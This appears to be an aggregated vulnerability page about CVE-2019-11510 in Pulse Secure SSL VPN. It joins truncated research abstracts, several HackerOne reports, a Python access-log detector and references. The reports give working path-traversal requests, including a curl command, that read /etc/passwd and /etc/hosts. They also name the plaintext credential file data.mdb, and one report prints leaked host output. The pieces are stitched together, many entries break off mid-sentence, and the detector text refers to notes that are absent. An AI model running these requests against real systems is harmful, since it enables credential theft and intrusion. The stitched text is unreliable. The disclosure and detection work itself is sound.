VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
Yuning Jiang (National University of Singapore, Singapore; ORCID 0000-0003-4791-8452)
Nay Oo (NCS Cyber Special Ops R&D, Singapore)
Qiaoran Meng (National University of Singapore, Singapore)
Hoon Wei Lim (NCS Cyber Special Ops R&D, Singapore)
Biplab Sikdar (National University of Singapore, Singapore)
## Abstract
As interconnected systems proliferate, safeguarding complex infrastructures against an escalating array of cyber threats has become an urgent challenge. The growing number of vulnerabilities, coupled with resource constraints, makes addressing every vulnerability impractical, thereby rende
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath* (University of Adelaide, Australia)
Hussain Ahmad* (University of Adelaide, Australia; corresponding author)
Diksha Goel (CSIRO's Data61, Australia)
Muhammad Shuja Syed (SLB, USA)
Faheem Ullah (University of Adelaide, Australia)
*Authors contributed equally to this work.
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
arXiv
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
arxiv_fulltext·2024-03-20
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
Dynamic Vulnerability Criticality Calculator for Industrial Control Systems
Pavlos Cheimonidis and Konstantinos Rantos
Department of Computer Science, International Hellenic University, 654 04 Kavala, Greece
## Abstract
The convergence of information and communication technologies has introduced new and advanced capabilities to Industrial Control Systems. However, concurrently, it has heightened their vulnerability to cyber attacks. Consequently, the imperative for new security methods has emerged as a critical need for these organizations to effectively identify and mitigate potential threats. This paper introduces an innovative approach by proposing a dynamic vulnerability critical
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
hackerone·2024-06-18·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
## POC
Reading `/etc/p
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
hackerone·2021-07-29·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
## POC
Reading `/etc/passwd` v
HackerOne
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
hackerone·2020-05-07·CVSS 10.0
CVE-2019-11510 [CRITICAL] Command Injection (via CVE-2019-11510 and CVE-2019-11539)
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
**Summary:**
The Navy has a Pulse Secure SSL VPN (https://████████/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:
CVE-2019-11510 - Pre-auth Arbitrary File Reading
CVE-2019-11539 - Post-auth Command Injection
vulnerable hostname from ssl certificate: ██████████.navy.mil
The pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an unauthenticated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This file contains admin and other users' credentials in plain-text format. This information can be used to log into the Pulse device as an administrator.
Once logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
hackerone·2019-12-02·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that https://████ instance is vulnerable to described vulnerabilities.
## POC
Extracting `/etc/passwd` as examp
HackerOne
[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
hackerone·2019-12-02·CVSS 10.0
CVE-2019-11510 [CRITICAL] [CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc
**Summary / Description:**
█████ is vulnerable to Path Traversal which can lead to remote code execution.
## Impact
Critical
## Step-by-step Reproduction Instructions
1. Run the following `cURL` command to get the file `/etc/hosts`
```
curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'
```
```
## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019
127.0.0.1 localhost
█████128.141 KMPC1_Node4
█████████252.82 acrcxznxx07d-10███
███████252.74 acrcxznxx06d-10███
███252.67 ODA-SCAN███
█████████252.65 ODA-VIP-1█████████
█████████252.63 ODA-1██████
███252.196 subversion████████
██████252.134 acrcxznxx07d-12██████
```
HackerOne
Pulse Secure File disclosure, clear text and potential RCE
hackerone·2019-12-02·CVSS 10.0·CRITICAL
**Summary:**
Pulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE
**Description:**
CVE-2019-11510 is a file disclosure due to some normalization issues in Pulse Secure. I was able to reproduce this by grabbing `/etc/passwd`.
https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#
Though the impact of that is very limited, medium to high sec at best. From here we can grab a specific file.
The file `/data/runtime/mtmp/lmdb/dataa/data.mdb` contains clear text passwords and usernames; when a user logs in, from here we can then access the Pulse Secure instance. I stopped here due to not wanting to break the rules of engagement, but from here I woul
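Defender-side detection for the request pattern shown in the reports above, as an added example that is not part of any HackerOne report or of Pulse Secure's own tooling. It assumes a combined-style HTTP access log for the appliance (the sample lines below are constructed; source addresses and timestamps are made up), which in practice means SSL decryption or appliance-side logging, since the requests arrive over HTTPS. The helper names `classify_request` and `scan_log` and the indicator labels are my own.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real appliance). The request
# shape follows the URI quoted in the public reports; fragments ('#') never reach
# the server, so they do not appear in logs.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2019:13:24:40 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
203.0.113.7 - - [01/Aug/2019:13:25:01 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1834
203.0.113.7 - - [01/Aug/2019:13:25:03 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/ HTTP/1.1" 200 1048576
198.51.100.2 - - [01/Aug/2019:13:26:10 +0000] "GET /dana-na/..%2fdana/html5acc/guacamole/..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 200 512
10.0.0.9 - - [01/Aug/2019:13:27:00 +0000] "GET /dana/home/index.cgi HTTP/1.1" 200 2048
"""

# Combined-log-format request line: src, timestamp, method, target, status, size.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Files the public reports name as the targets of this bug.
SENSITIVE_FILES = (
    "/etc/passwd",
    "/etc/hosts",
    "/data/runtime/mtmp/lmdb/dataa/data.mdb",
)

# The path marker that the reports show being used to slip past the auth check.
BYPASS_MARKER = "/dana/html5acc/guacamole/"


def classify_request(target):
    """Return indicator names for one request target (path plus query string)."""
    path, _, query = target.partition("?")
    decoded = unquote(path)          # catch %2f / %2e-encoded traversal too
    segments = decoded.split("/")
    indicators = []
    if ".." in segments:
        indicators.append("dot-dot-segment")
        if BYPASS_MARKER in decoded:
            indicators.append("html5acc-guacamole-traversal")
    if query.startswith(BYPASS_MARKER):
        indicators.append("query-string-bypass")
    # Resolve the path the way a naive canonicaliser would, so the rule fires on
    # the destination file rather than on one exact byte sequence.
    resolved = normpath(decoded)
    if resolved in SENSITIVE_FILES:
        indicators.append("sensitive-file:" + resolved)
    return indicators


def scan_log(log_text):
    """Parse access-log lines and return one alert dict per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("target"))
        if indicators:
            alerts.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "indicators": indicators,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["src"], alert["status"], ", ".join(alert["indicators"]))
```

A 200 status on a request whose resolved path lands on `data.mdb` is the case to escalate first, since that file is the one the reports describe as holding plaintext credentials; a successful read there means every VPN credential on the box should be treated as compromised, which is consistent with the post-exploitation guidance in the detection notes above.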
HackerOne
Potential pre-auth RCE on Twitter VPN
hackerone·2019-08-10·CVSS 7.2·HIGH
Hi, we (Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we have been doing research on SSL VPN security, and found several critical vulnerabilities in Pulse Secure SSL VPN! We have reported them to the vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) have been released on `2019/4/25`. Since then, we have kept monitoring numerous large corporations using Pulse Secure and we noticed that Twitter hasn't patched the SSL VPN server for over one month!
These vulnerabilities include a pre-auth file reading (CVSS 10) and a post-auth (admin) command injection (CVSS 8.0) which can be chained into a pre-auth RCE! Here are all the vulnerabilities we found:
* CVE-2019-11510 - Pre-auth Arbitrary File Reading
* CV
References
- http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
- http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html
- http://www.securityfocus.com/bid/108073
- https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
- https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/
- https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
- https://kb.pulsesecure.net/?atype=sa
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
- https://lists.apache.org/thread.html/ff5fa1837b6bd1b24d18a42faa75e165a4573dbe2d434910c15fd08a%40%3Cuser.guacamole.apache.org%3E
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010
- https://www.kb.cert.org/vuls/id/927237
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-11510
Published: 2019-05-08
Added to CISA KEV: 2021-11-03
Exploited in the wild